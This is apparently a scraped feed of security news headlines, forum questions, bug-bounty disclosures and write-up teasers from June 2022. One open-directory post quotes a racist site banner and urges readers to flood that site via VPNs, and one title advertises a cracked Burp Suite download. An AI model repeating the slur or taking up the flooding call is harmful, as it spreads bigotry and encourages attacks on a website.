    submitted by /u/oDeathwingo [link] [comments]
    Radio Dramas
    https://ganahee.com/archive/Shows/ submitted by /u/c-rn [link] [comments]
    Index of /
    submitted by /u/taramj13 [link] [comments]
    Talking History - never been seen here before *apparently* & an oldie but a goodie - updated due to uhh... landing page.
    https://www.albany.edu/talkinghistory/pacifica-archives/ NO BLACKS NO INDIANS NO JEWS LIBERAL SUBNET BANS APPLIED CHINA AND RUSSIA WELCOME VISIT VIA: http://109.120.203.163/web/blyad.club/Music/ EDIT: Can I suggest we all use Chinese and Russian vpns to hammer the living shit out of blyad.club. submitted by /u/ringofyre [link] [comments]
  • Open

    CyberTalents — Airport
    Ok so OSINT was not my strong suit. Continue reading on Medium »
    War in Ukraine / June 23
    Ukraine retreats from Severodonetsk Continue reading on Medium »
  • Open

    Best thing to learn for SOC Analyst?
    Hey guys I am looking to get my Security+ by the end of the summer and finish my Cyber security related diploma in College by the end of the year. Any recommendations on which SIEM I should learn? What is most common? I was thinking ELK, Splunk, or QRadar? submitted by /u/kingkarmaxii [link] [comments]
    Signing into Windows 10 with a School account on a new User
    So I'm just starting Uni and I have been given a Microsoft 365 account from them. If I sign in as a new user on my PC with the school account, what data do they have access to? I have a D drive on my PC with family photos, receipts, tax info etc that I don't really want my school having access to. Are they able to see other drives on my device? or do they only see what's in OneDrive and what I do on edge while signed into my school's 365 account in the browser? Thanks! submitted by /u/Dazr87 [link] [comments]
  • Open

    Analyzing a macro enabled office file.
    Hi! So if you’re using Microsoft Office and you been around for quite a while. You probably heard about Macros? Continue reading on Medium »
    Red Team and Blue Team Training
    Modern malware actors get into the companies’ networks and steal any sensitive data they need. One of the effective ways to keep the… Continue reading on Medium »
  • Open

    Netsec Goggle for Brave Search
    submitted by /u/alxjsn [link] [comments]
    Hagana - A novel approach to runtime protection for NodeJS to prevent supply chain attacks
    submitted by /u/beckerman_jacob [link] [comments]
    Playing Docker? Bad Containers and What They Teach Us
    submitted by /u/Illustrious_Yard_576 [link] [comments]
    The curious tale of a fake Carrier.app
    submitted by /u/lormayna [link] [comments]
    CookieMonsteRCE: Stored XSS to RCE in Zena
    submitted by /u/jibblz [link] [comments]
    The Far Point of a Static Encounter
    submitted by /u/amirshk [link] [comments]
  • Open

    Looking for recommendations to include in a presentation for people starting out in DFIR
    What are some important things to discuss for people who may or may not be looking to have a career in DFIR? I'm mainly going to be talking about my career progression in DFIR (how I got into it, how I got into my current position, etc) but I want to make the majority of the presentation helpful and about the audience. How can I make it entertaining, engaging and knowledgeable? I don't want to make it too technical, as the majority of the audience will be non-technical. Any help is appreciated! submitted by /u/haloman882 [link] [comments]
    Cellebrite vs. Oxygen
    Hi all I would like to ask what experiences you have had with both tools and where you see the advantages and disadvantages of the two solutions. As far as I know, cellebrite's strengths lie mainly in its support for older devices. I also find the tool a bit more user-friendly. I also noticed that with Oxygen it is not possible to hide all the data that you are no longer allowed to have in an OFBR backup. What are the other strengths and weaknesses of the tools mentioned? Many thanks for your help :) submitted by /u/B-Boy_DG_ [link] [comments]
    add NSRL hashset to EnCase Forensics V8.05
    Hi Forensicators, Pretty much what the title says, I am trying to add the latest RDS minimal NSRL hashset to EnCase Forensic v8.05. The hashset I downloaded from the NIST website is a zip file which upon extraction is a bunch of text files. But I think EnCase is looking for a different format and throws an error that HashRoot.bin is not available. Can someone help me with the link to download the latest NSRL hashset in the EnCase format or some other way to add this hashset. Thanks. submitted by /u/AcalTheNerd [link] [comments]
  • Open

    SecWiki News 2022-06-24 Review
    Reflections on the evolution of security teams and personal positioning by ourren; A preliminary exploration of cyberspace battlefield environment mapping by ourren; Reviewing the satellite war: the Hack-A-Sat 2 space-based attack-defense competition by ourren; Reviewing the satellite war: the Hack-A-Sat 1 space-based attack-defense competition by ourren; For more of the latest articles, visit SecWiki
  • Open

    Static code analysis: the C language chapter
    Starting with this article, the author opens a series on C-language code security analysis, dissecting in detail the various technical details of static code analysis for C.
    FreeBuf Morning Report | CNKI placed under cybersecurity review; attackers exploit Log4Shell to compromise VMware servers
    On June 23, 2022, the Cybersecurity Review Office summoned the head of Tongfang Knowledge Network (Beijing) Technology Co., Ltd. and announced the launch of a cybersecurity review of CNKI.
    Cunning Kitten: a threat group targeting individuals connected to the Middle East
    Cunning Kitten's targets are Persian-speaking individuals around the world; it launches attacks built around political topics those individuals care about.
    QNAP warns that a critical PHP vulnerability can lead to remote code execution
    QNAP is addressing a critical PHP vulnerability that could be exploited to achieve remote code execution.
    LambdaGuard: an audit tool for the security of AWS serverless environments
    AWS Lambda is an event-driven serverless computing platform provided by Amazon Web Services.
    NSO finally admits it! At least 5 European countries are using Pegasus spyware
    The controversial Israeli surveillance software vendor NSO Group has admitted to EU lawmakers that at least five countries in Europe have used the company's Pegasus spyware.
    CISA: threat actors exploit the Log4Shell vulnerability to compromise VMware servers
    Recently, CISA stated that threat actors, including state-sponsored hacking groups, are still using the Log4Shell (CVE-2021-44228) remote code execution vulnerability against VMware Horizon and Unified Access Gateway (UAG) servers. Attackers can remotely exploit Log4Shell on vulnerable servers exposed to local or Internet access and move laterally across the network until they gain access to internal systems containing sensitive data. After its disclosure in December 2021, multiple threat actors
    FreeBuf Weekly | US authorities say they have taken down the RSOCKS botnet; Facebook faces class action lawsuit
    Happy weekend, FreeBufers! Here is this week's "FreeBuf Weekly": we have summarized and recommended this week's hot news, quality articles and handy tools, so you won't miss any of this week's highlights!
    Top 10 vulnerability scanning tools of 2022
    A rundown of the top ten vulnerability scanning tools
    One of the hardest-grinding ransomware groups in history, working more than 14 hours a day
    When even ransomware groups are grinding this hard, one can imagine the pressure on the security industry, which is forced to grind along with them.
  • Open

    There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families
    Learn about the unique implementations of API Hammering malware samples and how to mitigate them. The post There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families appeared first on Unit 42.
  • Open

    WordPress WP HTML Mail plugin Vulnerable to XSS
    The XSS vulnerability in the WordPress WP HTML Mail plugin for personalized emails makes it vulnerable to code injection and phishing… Continue reading on Medium »

  • Open

    Chrome 104 Beta: New Media Query Syntax, Region Capture, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 104 is beta as of June 23, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Region Capture Chrome on Desktop can now crop self-captured video tracks. Web apps are already able to capture video in a tab using getDisplayMedia(). Region capture allows web apps to crop a track and remove content from it, typically before sharing it remotely. For example, consider a productivity web app with built-in video conferencing. During a video conference, a web app could use cropping to exclude th…
  • Open

    Burpsuite Pro crack Download in kali Linux
    Hello Friends Continue reading on Medium »
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello Beautiful hackers Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Intigriti — XSS Challenge — February 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Hello my name is rootjkqsta. I am Bug Bounty Hunter, Web App Pentester, Security Researcher and CTF player. So I was thinking why not to… Continue reading on Medium »
    Recon — All In One, Fast, Easy Recon Tool (HydraRecon)
    HydraRecon tool is an automated tool developed in the Python language which performs the task of Information Gathering and Crawling the… Continue reading on Medium »
  • Open

    DC Firewall segmentation alternatives
    Hello, We currently do not have any DC firewall at our healthcare facility. We cater for around 4000 users. It is a single site and there are remote vpn vendors connecting to support medical equipment. All vlans are behind the core switches. Now segmentation is one area we want to address, but not sure with plugging in a DC firewall is still the goto solution, as it can cause impact, be a SPOF. There are many other offerings claiming to do this , like NAC vendors, endpoint firewall agents , etc. I have been hearing positive things about Cisco tetration as well. Appreciate your inputs about segmentation paths experience other than internal/dc firewalling submitted by /u/MoeShea [link] [comments]
    Cheap and efficient way to host WP website in many different countries
    So for my undergraduate degree I'm developing a honeypot WordPress website and I want to host this website in different countries to see if the attacks differ depending on geographical differences. Now I can go ahead and buy a package from ex. Kinsta for 5 different websites and pay 150$ for that, but before I do that do you guys recommend any other more clever and more cost efficient idea to solve my issue. submitted by /u/krullmizter [link] [comments]
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Ukraine War —  Geolocation #1
    On 08/03/2022, Twitter user @tinso_ww tweeted the following video consisting of two video clips taken from a UAV in Ukraine. Continue reading on Medium »
    War in Ukraine / June 22
    The Ukrainian agricultural sector estimates losses of $23 billion. This will also hurt world food prices Continue reading on Medium »
    OCTOSUITE — Advanced GitHub OSINT Framework
    OCTOSUITE is a tool that allows you to easily extract various data from a public GitHub profile. Continue reading on 100security »
    OSINTEYE — PyPI, GitHub, Instagram e DockerHub
    OSINTEYE is a tool that allows you to easily extract various data from a public profile on the platforms PyPI, GitHub, Instagram… Continue reading on 100security »
    A short glossary of 12 Cybersecurity Techniques
    A short list of some cybersecurity techniques, both computer and human. Continue reading on Medium »
    The history of the internet and the first search engines
    How, when and by whom was the internet created? The history of ARPANET. About the first computer networks, FTP servers, web scanners, crawlers and search engines. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    Fuzzing rust-minidump for Embarrassment and Crashes – Part 2
    Article URL: https://hacks.mozilla.org/2022/06/fuzzing-rust-minidump-for-embarrassment-and-crashes/ Comments URL: https://news.ycombinator.com/item?id=31852480 Points: 103 # Comments: 2
  • Open

    Any DFIR-Orc user who could help with KAPE embedding?
    Hello, I’m an intern in a company’s forensics lab. My job is to set up DFIR-Orc (artifact collector from ANSSI), to replace the Velociraptor collector we currently use. Atm I’m having issues trying to embed Kape inside of Orc. I’m able to run KAPE from DFIR-Orc, but Kape isn’t able to find the .tkape files so it doesn’t collect anything of course. Does anyone here know or has already used DFIR-Orc and would be willing to help? Thanks. Edit : I’ve tried to find resources online, but nobody seems to have ever done this before, so I’m trying my luck here submitted by /u/Aigle13 [link] [comments]
  • Open

    This repo contains information about EDRs that can be useful during red team exercise.
    submitted by /u/M_Reza_Bakhtiyari [link] [comments]
    Miracle - One Vulnerability To Rule Them All
    submitted by /u/scopedsecurity [link] [comments]
    fuzzuli is a fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
    submitted by /u/0xmusana [link] [comments]
    Understanding the Compound File Binary Format and OLE Structures to Mess with CVE-2022-30190
    submitted by /u/canmaplap [link] [comments]
  • Open

    SecWiki News 2022-06-23 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    How to use SMBSessionSpoofer to forge SMB sessions
    SMBSessionSpoofer is a security tool for SMB sessions that can help researchers easily create a forged SMB session.
    Exploiting leaked cloud host AK/SK credentials
    Cloud hosts verify the identity of a request's sender by using an Access Key Id / Secret Access Key-based encryption method.
    FreeBuf Morning Report | Northwestern Polytechnical University hit by overseas cyberattack; Conti ransomware attacks more than 40 organizations in one month
    The Lyceum group is known for targeting the Middle East's energy and telecommunications sectors and relies mainly on .NET-based malware.
    How to use Blackbird to do social-network OSINT from a username
    About Blackbird: Blackbird is a powerful open-source intelligence gathering tool that can help researchers quickly search up to 119 social media sites by a target user's username and collect information on the related accounts. Blackbird supports sending asynchronous HTTP requests, which greatly improves its running efficiency and performance. Features: 1. Local web server 2. Search by username 3. Metadata extraction 4. JSON data reading and storage 5. Report generation 6. High efficiency and speed. Supported social media sites: the current version
    Lithuania hit by cyberattacks after its "embargo" on Russia
    Recently, the emerging hacker group "Cyber Spetsnaz" may have turned its sights on Lithuanian government resources and critical infrastructure.
    MEGA fixes critical vulnerabilities that allowed decryption of user data
    MEGA has released a security update to address a series of serious vulnerabilities that could expose user data.
    "Opinions on Building Basic Data Systems to Better Leverage the Role of Data as a Factor of Production" reviewed and approved
    The building of basic data systems concerns the overall situation of national development and security; national data security must be safeguarded, personal information and trade secrets protected, and the construction of a basic data system framework accelerated.
    Process protection implemented with ObRegisterCallbacks
    This article briefly explains how to use ObRegisterCallbacks to implement process protection.
    Microsoft: Russia will step up cyberattacks on Ukraine's allies
    Russian intelligence agencies have stepped up cyberattacks on the governments of countries allied with Ukraine.
    Game security | Analysis of the "shout" CALL: analyzing the parameters
    Making videos is hard work; please like, favorite and share, many thanks~ Add the official account "极安御信安全研究院" and reply with the code "资料" to receive the tools, source code and study materials related to the video, plus other free reverse engineering courses. To join the discussion group, reply with the code "交流群"
    New forces in cybersecurity: which founders will investors and industry judges pick?
    Opening a new cybersecurity universe; come cheer for the founder you support!
    What if the Three Kingdoms had held cybersecurity attack-defense drills
    The essence of war is confrontation between people; in a sense, cyber attack and defense is simply war taking place in the virtual world.
  • Open

    Tails 5.1.1 is out – fixes high severity CVE-2021-38385
    Article URL: https://tails.boum.org/news/version_5.1.1/index.en.html Comments URL: https://news.ycombinator.com/item?id=31847510 Points: 2 # Comments: 0

  • Open

    Bypass for Domain-level redirects (Unvalidated Redirects and Forwar)
    GitLab disclosed a bug submitted by thypon: https://hackerone.com/reports/1582160
    Able to approve admin approval and change effective status without adding payment details.
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1543159 - Bounty: $5000
  • Open

    Received scam email and the "From" field was my email
    Hi. How did the attacker spoof my email address? The email didn't pass SPF and DMARC, but I still got the message. I got this email: https://www.brendinghat.com/2022/06/20/there-is-an-overdue-payment-under-your-name-please-settle-your-debts-asap/ submitted by /u/athanielx [link] [comments]
    Phone stolen, thief somehow got my banking info. I'm confused as to how, help.
    So June 11th, I go out to a bar in downtown Montréal, my phone gets stolen, only my phone, I still have my cards and all. I change my passcodes to everything that night, except my bank. I can’t because I need the verification code they’d send to my phone. I have 2 factor authentication so the thieves would theoretically need my debit card number, my password, and the pin that gets sent to my phone to get into my mobile banking. Somehow today I get a “pre authorized debit DOB” that pops up on my account for 999$; this type of transfer requires the thief to have my account number and the transit number, which are only in the mobile banking app. Now my question is, how would someone get the info off my mobile bank. (Oh also, I deactivated my SIM card the next morning after the theft, and through Find My Phone the minute the phone touches wifi it wipes all the contents.) Just confused as to how this possibly could have happened. submitted by /u/Working-Plantain8273 [link] [comments]
    Azure firewall log analysis tool
    What do you all use in the way of log analysis tools to monitor and dashboard out your firewall data as it pertains to the various managed resources w/in your environments that are externally facing? submitted by /u/Dalgan [link] [comments]
    Best Sandbox Solution(s)?
    Hello all. In a government subcontractor environment, I get asked a couple of times a month, "This file is suspicious, can you open it in a sandbox for me?" But I am not sure what I can use to do this. I know Microsoft Office has a sandboxing capability, but I'm not sure how I make sure my file is opened in the sandbox. It is quite finicky. Are there any other applications that can be used instead? What sandbox application/solution are you using? T.I.A. submitted by /u/NoMomNotTheBelt14 [link] [comments]
  • Open

    Dos and Windows 3.x Software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Bug Bounty Tips #001
    Unverified Password Change Continue reading on The Mayor »
    Bug Bounty Tips #001
    Finding Projects Continue reading on The Mayor »
    $1500 Of Broken Access Controls
    Hello, Continue reading on Medium »
    Critical Git Repository Leaked Internal Data
    Description: Continue reading on Medium »
    2 GREAT TOOLS FOR PENTESTER
    Hi guys! I’m back with a new blog, this will be short but I think it’s great because I’ll show you two tools that are for me now basic for… Continue reading on Medium »
  • Open

    War in Ukraine / June 21
    Belarus continues to be a problem for Ukraine Continue reading on Medium »
    Proper Development Update of gotEM and Recent Events
    Hello community! Continue reading on Medium »
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial: Java deserialization vulnerability exploitation tool by ourren; When XM 12 meets eBPF by ourren; 2022 Internet of Vehicles data security regulation research report by ourren; Overview of the telecom network fraud black/grey-market ecosystem: infrastructure by ourren; MITRE supply chain security System of Trust (SoT™) technical framework by ourren; Measuring Kazakhstan's large-scale interception of HTTPS by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Improvements for Go fuzzing in version 1.19
    Article URL: https://www.code-intelligence.com/blog/fuzzing-golang-1.19 Comments URL: https://news.ycombinator.com/item?id=31835857 Points: 6 # Comments: 1
  • Open

    FreeBuf Morning Report | An open-source code project has 49 vulnerabilities on average; Amazon launches the AWS Center for Quantum Networking
    Europol announced on June 21 that it had dismantled a criminal group involved in phishing, fraud and money laundering.
    Industrial control security faces a severe challenge: 56 critical vulnerabilities sweep across OT devices
    Security researchers found 56 critical security vulnerabilities in products from 10 OT vendors; Forescout refers to the 56 findings collectively as "OT:ICEFALL".
    How to keep email communication with the FDA securely encrypted?
    This article covers how to keep email communication with the FDA securely encrypted.
    Cloudflare outage takes down hundreds of websites
    On June 21, US Eastern time, network infrastructure provider Cloudflare suffered an outage that caused widespread disruption of hundreds of websites.
    New DFSCoerce NTLM relay attack lets attackers take control of Windows domains
    Security experts have discovered a new Windows NTLM relay attack named DFSCoerce that allows attackers to take control of Windows domains.
    Police bust phishing gang that caused millions of dollars in losses
    Following a law-enforcement operation coordinated by Europol, members of a phishing gang that caused millions of euros in losses were arrested.
    CVE-2020-1472
    CVE-2020-1472 is a critical remote privilege-escalation vulnerability in Windows domain controllers.
  • Open

    Semgrep rules for PHP security assessment
    submitted by /u/0xdea [link] [comments]
    ShoMon V2: Shodan Monitoring Integration for TheHive written in Golang
    submitted by /u/KaanSK [link] [comments]
  • Open

    A brief chat about 2 interesting recent vulnerabilities
    Author: heige@知道创宇404实验室 (Knownsec 404 Lab). Original link: https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 A few days ago the p0 blog published an article, "An Autopsy on a Zombie In-the-Wild 0-day", an "archaeology" of CVE-2022-22620, an in-the-wild vulnerability disclosed in February 2022; it is quite inter...

  • Open

    Weak rate limit for SIGN.PLUS email verification
    Alohi disclosed a bug submitted by zeesozee: https://hackerone.com/reports/1584569
  • Open

    Do you know any good awareness blogs about malware and endpoint protection?
    Hello! Do you know any good awareness blogs/videos/articles about malware and endpoint protection? It should be for a user who is not familiar with cyber security. I found a lot of cool information about anti-phishing, but I need something more that focuses on malware infection. submitted by /u/athanielx [link] [comments]
    SIEM Tools - AlienVault, possibly moving to Microsoft Sentinel
    Hi All, I've worked in AlienVault USM for 3 years now and do not love the SIEM feature or really anything about it. The company may be able to get Sentinel at a pretty fair price. Does anyone have experience with Sentinel or both tools? Or other recommendations for a "small" company with few security analysts. Healthcare Company size: 1,500 people Security Team: Very small, 2 people Thanks, submitted by /u/compguyguy [link] [comments]
    Pentesting DNS?
    I was assigned to do a "DNS pentest". That's what they call it, but I have no idea where to start or what I need to ask the Network team. Do I need some credentials or anything? Appreciate all the answers. submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Securing a private database
    I'm interested in understanding the common ways people secure their internal database for access by, for example, developers. Example one: for an on-premise database, do you just use a VPN and local database users? Or do you connect the database to some sort of single sign-on where possible? How would you audit this? Example two: for a private database in a public cloud, how do you control connectivity? Do you use a VPN for that too, or a bastion host, or just security group settings (for AWS, for example)? For both these examples, how would you scale tracking and managing users, credentials and authz (who's allowed to do what)? Thanks for any feedback. submitted by /u/cewdesign [link] [comments]
  • Open

    $1,500 XSS — what to consider during the bug bounty
    Hello folks, long time no see! I recently got my bounty from one of the private programs on HackerOne and wanted to talk about it, share my… Continue reading on Medium »
    IDOR vulnerability
    1- What’s the IDOR? Continue reading on Medium »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    Hi Hackers! Welcome back to my new write-up. My name is Krishnadev P Melevila. I am a 20-Year-old Self-Learned Ethical Hacker. Continue reading on InfoSec Write-ups »
    I Found IDOR In Private Program Via API
    WHOAMI: Continue reading on Medium »
    Java Application -Server Side Template Injection
    Description: Continue reading on Medium »
  • Open

    War in Ukraine / June 20
    👉 Laws passed by the Verkhovna Rada of Ukraine during the 110 days of the war Continue reading on Medium »
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    Container escapes: Detecting abuses of Linux capabilities with Falco + Intro to CAP_SYS_ADMIN
    submitted by /u/capitangolo [link] [comments]
    A deep dive into Sigma rules and how to write your own threat detection rules
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering an old Mario & Luigi game for fun
    submitted by /u/CyberMasterV [link] [comments]
    Intercepting MS Teams Communication
    submitted by /u/OwnPreparation3424 [link] [comments]
    When the CAS let you in - abusing misconfigured Actuator in Apereo CAS
    submitted by /u/qwerty0x41 [link] [comments]
    Does Acrobat Reader Unload Injection of Security Products?
    submitted by /u/woja111 [link] [comments]
  • Open

    SecWiki News 2022-06-21 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Notes from a real-world attack/defense exercise (initial access - EDR - intranet - lateral movement - vCenter)
    Not long ago I took part in an attack/defense exercise; the process was both simple and tortuous, and in the end I obtained vCenter management console privileges through lateral movement, successfully taking the exercise target.
    Shunde Rural Commercial Bank 2021 fintech talent recruitment fully launched~~
    We sincerely invite you to help write Shunde Rural Commercial Bank's digital future!!
    FreeBuf Morning Report | Former Amazon employee convicted over data breach; Google Chrome extensions can be used to track users online
    Former Amazon employee convicted over data breach.
    Alarming! Data of 1.5 million customers of US Flagstar Bank leaked
    Personal data of more than 1.5 million Flagstar Bank customers was accessed by hackers in a cyberattack last December.
    Microsoft issues emergency update fixing Microsoft 365 sign-in problems on ARM devices
    Microsoft recently released an out-of-band (OOB) Windows update.
    APT28 member charged with hacking NATO think tank
    A hacker has been charged with a cyber-espionage attack on the Joint Air Power Competence Centre, a NATO think tank located in Germany.
  • Open

    The complete bitdl.ir List
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Find out formatted or merged partitions
    Hello all, I have a laptop SSD drive with Windows. I took the drive, created an E01 file, decrypted it from BitLocker encryption, and I want to know the history of the partitions. I tried to use volume shadow copies but they are all very recent; how can I tell if the partitions changed somehow? Thanks in advance. submitted by /u/tzichntzch [link] [comments]
    Convert Parallels image
    Hey guys, maybe one of you can help me. I'm investigating an image of an older MacBook. There is a Win10 Parallels VM inside. Is it possible to extract an image of this VM? In the best case directly as .e01? I don't have a Mac myself so I can't use Parallels to convert the VM. The only way I discovered some evidence is by carving.. submitted by /u/kaibring [link] [comments]
    $8k tower budget
    Company recently gave me a $15k budget, $8k specific to a new PC. Does anyone have any recent forensic tower builds for under $8k used to process cell dumps and run analytics, or custom build companies you recommend? Found a Dell Precision 7910, Xeon E5-2698 v4 2.2 GHz, 20 cores, 512 GB DDR4 that's under $6k, but not excited about Xeon. Looking for options and new accessories to build out the $15k. submitted by /u/WhoAteTheLastCookie [link] [comments]
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    CVE-2022-1040: A journey through the Sophos Firewall service architecture and authentication bypass vulnerability analysis
    Author: 且听安全. Original link: https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q Vulnerability information: Some time ago an authentication bypass vulnerability, CVE-2022-1040, was disclosed in Sophos Firewall; recently, while analyzing the Sophos service architecture in depth, I fully reproduced it. The authentication bypass exists mainly in two interfaces, the User Portal and Webadmin, and the vulnerability cleverly exploits...
    CVE-2022-27925: Path traversal in Zimbra Collaboration ultimately leads to RCE
    Author: 且听安全. Original link: https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA Vulnerability information: Some time ago Zimbra officially announced an RCE vulnerability, CVE-2022-27925, and some folks discussed it in the Vulnerability Space Station; I had time at home last weekend to finish analyzing and reproducing it. The principle of the vulnerability is not complicated, but I hit some pitfalls while setting up the environment; the analysis process is shared below. Judging from the description, ...
    WebLogic CVE-2021-2294 JDBC deserialization vulnerability analysis
    Author: thiscodecc@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg Vulnerability summary: On January 12, 2021, Moyun Security V-Lab reported a WebLogic Server JDBC deserialization vulnerability to Oracle; on April 21, 2021 Oracle published its acknowledgement. In late November 2019, Yang Zhang and others ...
  • Open

    Kryptos Support Write-up
    Hack The Box Cyber Apocalypse 2022 Continue reading on Medium »

  • Open

    Is it possible to get loader/dropper malware on iPhone?
    Specifically from the Apple App Store: can programs come packed with, or download, secondary malicious apps that are invisible to the user? Or is this impossible given the file system of the iPhone? submitted by /u/machine_funk [link] [comments]
    Is there any way to only present OTP when client side properties (IP address/useragent) changes
    Hey, one idea was to have a list of trusted locations (public IP address) and trusted devices (user agent), and if the public IP address or device associated with the username changed on /login or /reset-password, the user would be presented with an SMS OTP code form. Why? Many of the web application users are seniors or technically inept users, and management wants to lower the number of OTP codes being presented to the users (please note that the devices accessing these applications are stationary PCs). Any other way you'd go about doing this? Anything that can be unique for each client that can be gathered using JS? submitted by /u/RubaLion07 [link] [comments]
    hey guys hope you can help me with my CV
    This is my resume; hope you can help me and tell me what I'm missing. I keep applying to jobs but get no answer. BTW, I'm taking my OSCP exam next week https://www.velvetjobs.com/resume/spkheh/ahmed-tahah submitted by /u/J0r3n3y [link] [comments]
    How to safely share passwords and other sensitive information in the company?
    What ways do you know to share sensitive information? For example, to share a password to an FTP or API doc, or a private link, etc. I know this resource: https://onetimesecret.com/, but I'm not sure if it's safe. submitted by /u/athanielx [link] [comments]
    Looking for a book/course about gathering threat Intel
    I've come across many books in my search about the concept of threat intel and how to use it. I'm currently looking for a book or course about how to gather threat intelligence data from the clear web and dark web. Are there any recommendations? Thank you, submitted by /u/DoubleAgent10 [link] [comments]
    what skills to focus on for top dollar
    What niche or skills are most in demand that businesses are paying top dollar for? I don't want to be OK at everything, as I've heard that's not good, but should be an expert in a niche. I am taking the Sec+ test in a few days and would like to know what skills I should get next in order to be job ready. submitted by /u/Mufakinyanyo [link] [comments]
  • Open

    Hacking into the worldwide Jacuzzi SmartTub network
    submitted by /u/EatonZ [link] [comments]
    Zero Trust - A Layered Approach against threats
    submitted by /u/J_0_5 [link] [comments]
    semgrep rule pack by elttam - Java entry-points and security issues in Jackson, Spring Remoting, and Struts DMI
    submitted by /u/Gallus [link] [comments]
    Linux Threat Hunting: 'Syslogk' a kernel rootkit found under development in the wild
    submitted by /u/nykzhang [link] [comments]
  • Open

    Mixed Content
    https://www.midian.appboxes.co/APPS1/ https://lockdown.madhouse.appboxes.co/Software/ https://lmao.lolxd.workers.dev/0:/ Not sure if it has any NSFW content. submitted by /u/tempoguyx [link] [comments]
    Some audiobooks - there's a good section on Terry Pratchett. I searched using "site:reddit.com/r/opendirectories/ drunkresearch" and got nothing, so looks NEW!
    submitted by /u/ringofyre [link] [comments]
    text to speech audiobooks
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    War in Ukraine / June 17–19
    To capture Luhansk region till June 26 Continue reading on Medium »
    How to use GIS for Machine Learning
    In our 2 previous amazing articles : Continue reading on Preligens Stories »
    OSINT DOJO- Geolocation Challenge! 20 Jun 2022
    Usually the first thing I would do as a low hanging fruit is to just run the image through Tineye, Yandex and Google Image Search. Nothing… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki Weekly (Issue 433) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Authentication CSRF resulting in unauthorized account access on Krisp app
    Krisp disclosed a bug submitted by yassineaboukir: https://hackerone.com/reports/1267476 - Bounty: $1000
    Add more seats by paying less via PUT /v2/seats request manipulation
    Krisp disclosed a bug submitted by life__001: https://hackerone.com/reports/1446090 - Bounty: $500
    Admin Authentication Bypass Lead to Admin Account Takeover
    UPS VDP disclosed a bug submitted by 7odamo: https://hackerone.com/reports/1490470
  • Open

    Magnet axiom process error message
    Hi, I have come across this error message (process error - axiom process encountered an error while decrypting the evidence source) in Magnet AXIOM Process and can't find anything that tells what's wrong. This one occurs on the last step, when I attempt to start and analyse the E01 file. I have also started the process with the same E01 file on another computer with weaker hardware; that one doesn't get the error message and starts the process, but gets stuck at 40% (when it analyses files and folders). The BitLocker key I'm using is also correct, tested to unlock it multiple times. Is there any clue on what this error message means and why it occurs? To add more, in FTK Imager I just saw I got this message: ATTENTION: The following sector(s) on the source drive could not be read: The contents of these sectors were replaced with zeros in the image. I have done three FTK Imager images now and they all end up the same. submitted by /u/Gackie [link] [comments]
    Booting a image from OSFClone
    Hi all, I have made an image of a system with OSFClone. This generated a file with no file extension. Now I want to boot a copy of the system in VMware Workstation, but it only accepts .raw or .dd files. I can view the file in Autopsy. Does anyone know how to boot this image file? Thanks in advance! submitted by /u/ProAdmin007 [link] [comments]
  • Open

    Every XSS is different
